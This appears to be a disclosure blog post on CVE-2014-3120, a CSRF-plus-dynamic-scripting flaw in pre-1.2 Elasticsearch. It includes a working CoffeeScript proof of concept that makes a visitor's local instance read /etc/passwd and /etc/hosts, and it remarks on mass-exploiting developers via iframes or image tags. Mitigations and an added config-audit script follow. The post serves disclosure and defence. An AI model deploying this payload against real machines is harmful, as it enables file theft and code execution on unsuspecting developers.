Insecure default in Elasticsearch enables remote code execution

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors who have Elasticsearch installed. If you’re running Elasticsearch in development, please read the instructions on how to secure your machine. Elasticsearch version 1.2 (which is unreleased as of writing) is not vulnerable to remote code execution, but still has some security concerns.

The problem(s)

There are a couple of problems which enable the proof of concept I’m going to present:

  • Elasticsearch has no access roles or authentication mechanism. This means that you have full control over a cluster the moment you connect to it.
  • The API for Elasticsearch is accessible over HTTP and provides no CSRF protection whatsoever.
  • It contains a feature which makes it possible to evaluate expressions as part of a query. An example usage of this feature is to specify a custom scoring function while searching through documents. It uses the MVEL language by default.
  • Up to version 1.2 dynamic scripting (which makes it possible to send scripts to the cluster on the fly) was enabled by default. As mentioned in the documentation, this feature gives someone the same privileges as the user that runs Elasticsearch. MVEL has no sandboxing at all.

There are no issues up to this point as long as you properly follow the documentation and make sure your Elasticsearch cluster is not available from the outside world. There is one target that isn’t mentioned in the documentation though: The Developer! When you’re developing an application that uses Elasticsearch, you probably have it running on your machine. The default port is 9200 and because there is no CSRF protection any webpage can just connect to the cluster using localhost:9200 as the host.

PoC

The following script will read /etc/hosts and /etc/passwd from a user visiting a webpage and display the contents in the browser.

# Build an MVEL script that reads the given file on the host running Elasticsearch
read_file = (filename) ->
  """
  import java.io.File;
  import java.util.Scanner;
  new Scanner(new File("#{filename}")).useDelimiter("\\\\Z").next();
  """

# This PoC assumes that there is at least one document stored in Elasticsearch, there are ways around that though
$ ->
  payload = {
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {}
  }

  # One script field per file; each script is evaluated for the matched document
  for filename in ["/etc/hosts", "/etc/passwd"]
    payload["script_fields"][filename] = {"script": read_file(filename)}

  # A plain JSONP GET against the developer's local instance: no authentication, no CSRF token
  $.getJSON "http://localhost:9200/_search?source=#{encodeURIComponent(JSON.stringify(payload))}&callback=?", (data) ->
    console.log(data)
    for hit in data["hits"]["hits"]
      for filename, contents of hit["fields"]
        document.write("<h2>#{filename}</h2>")
        for content in contents
          document.write("<pre>" + content + "</pre>")
        document.write("<hr>")

You can verify whether you’re vulnerable by trying out the above PoC here.

There are many ways to exploit this: you could link the victim to the page or embed it as an iframe. You can even exploit it by crafting a URL and using it as the src of an <img>, as the only thing that needs to happen is a single GET request. No user interaction required!

Because this is so easily exploitable you can mass-pwn developers with relatively little work.

How to secure against this vulnerability

Add the following line to your elasticsearch.yml to disable dynamic scripting and prevent remote code execution:

script.disable_dynamic: true

You should also make sure that your local Elasticsearch instance is only binding on localhost, as otherwise someone could exploit you over the LAN without making you visit a webpage. The Homebrew Elasticsearch formula does this automatically. This still means you’re vulnerable to the CSRF exploit though!

If you want to be as secure as possible, you should run Elasticsearch inside a virtual machine, to make sure it has no access to the hosting machine at all.
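As an added example (not part of the original post), a small audit script that checks an elasticsearch.yml for the two mitigations recommended above: dynamic scripting disabled and the HTTP port bound to loopback only. It assumes the Elasticsearch 1.x keys network.host / network.bind_host for the bind address and uses a minimal flat key: value parser rather than a full YAML library.

```python
"""Audit an elasticsearch.yml (1.x) for the mitigations against CVE-2014-3120."""
import ipaddress

# Names Elasticsearch 1.x accepts for "loopback only" (_local_ is the ES special value)
LOOPBACK_NAMES = {"localhost", "_local_", "127.0.0.1", "::1"}


def parse_flat_yaml(text):
    """Minimal parser for the flat 'key: value' lines used in elasticsearch.yml.
    Constructed for this audit only; it is not a general YAML parser."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip('"\'')
    return settings


def is_loopback(host):
    """True if the configured bind address can only be reached from the machine itself."""
    if host.lower() in LOOPBACK_NAMES:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False   # hostnames other than localhost are treated as non-loopback


def audit(text):
    """Return a list of findings; an empty list means both mitigations are in place."""
    s = parse_flat_yaml(text)
    findings = []
    # Up to 1.1.x dynamic scripting is on unless explicitly disabled.
    if s.get("script.disable_dynamic", "false").lower() != "true":
        findings.append("dynamic scripting enabled (set script.disable_dynamic: true)")
    # Assumed 1.x keys for the bind address; bind_host takes precedence when both are set.
    bind = s.get("network.bind_host") or s.get("network.host")
    if bind is None:
        findings.append("no bind address set; instance is not restricted to localhost")
    elif not is_loopback(bind):
        findings.append(f"bound to {bind!r}, reachable over LAN")
    return findings


if __name__ == "__main__":
    import sys
    for finding in audit(open(sys.argv[1]).read()) or ["OK: both mitigations present"]:
        print(finding)
```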

Additional targets

Disabling scripting will prevent code execution, but that still leaves us with the issue of being able to query and administer the instance without limit. A webpage can easily dump the whole database running on your machine, sensitive data included. This is impossible to fix by the Elasticsearch developers without adding authentication or CSRF protection.

If an attacker can figure out the internal address of your production Elasticsearch instance, you’re also open to leaking your production data. If your development machine is connected to a VPN which provides access to your Elasticsearch cluster, an attacker can easily query or shut down your cluster simply by making you visit a webpage.

Hackernews

Reddit

Notes

  • I have reserved CVE-2014-3120 for this issue.
  • This exploit was tested against Elasticsearch version 1.1.1 on MacOSX installed through Homebrew. No configuration changes were made.
  • I notified Elasticsearch through their security report instructions on the 26th of April 2014. They replied they were aware of it, but didn’t intend to do a security release and instead disable dynamic scripting by default in version 1.2.
  • This security issue has been independently discovered and blogged about on December 9th 2013.